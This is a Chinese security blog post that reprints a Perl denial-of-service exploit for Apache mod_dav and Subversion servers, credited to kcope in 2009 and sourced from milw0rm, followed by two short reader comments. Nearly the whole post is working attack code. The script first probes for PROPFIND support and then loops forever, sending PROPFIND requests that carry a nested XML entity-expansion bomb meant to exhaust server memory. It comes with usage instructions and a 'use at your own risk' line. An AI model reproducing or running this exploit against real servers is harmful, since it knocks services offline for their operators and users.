首页 > 网络安全 > Apache mod_dav / svn远程拒绝服务漏洞

Apache mod_dav / svn远程拒绝服务漏洞

利用此漏洞会耗尽系统所有内存资源。

###furoffyourcat.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n";
    print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];
                            
$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";    
}
print $sock "\r\n";
$x = <$sock>;    

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
    print;    
}
close($sock);
print "No PROPFIND on this server and path.\n";
exit(0);    
}

$a = "";
for ($i=1;$i<256;$i++) {        # Here you can increase the XML bomb count
    $k = $i-1;
    $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ELEMENT REMOTE ANY>\n"
."<!ENTITY x0 \"foobar\">\n"
.$a
."]>\n"
."<REMOTE>\n"
."&x$k;\n"
."</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack…\n";

$ExploitRequest =
"PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";    
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}

# milw0rm.com [2009-06-01]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/180

  1. 0point
    0point 6月 12th, 2009 @ 16:23 | #-31

    耗尽内存让服务器宕机,不就达到了拒绝服务的目的吗,呵呵。

  2. 海天无影
    海天无影 6月 12th, 2009 @ 13:06 | #-32

    汗 就为了耗尽内存?

评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks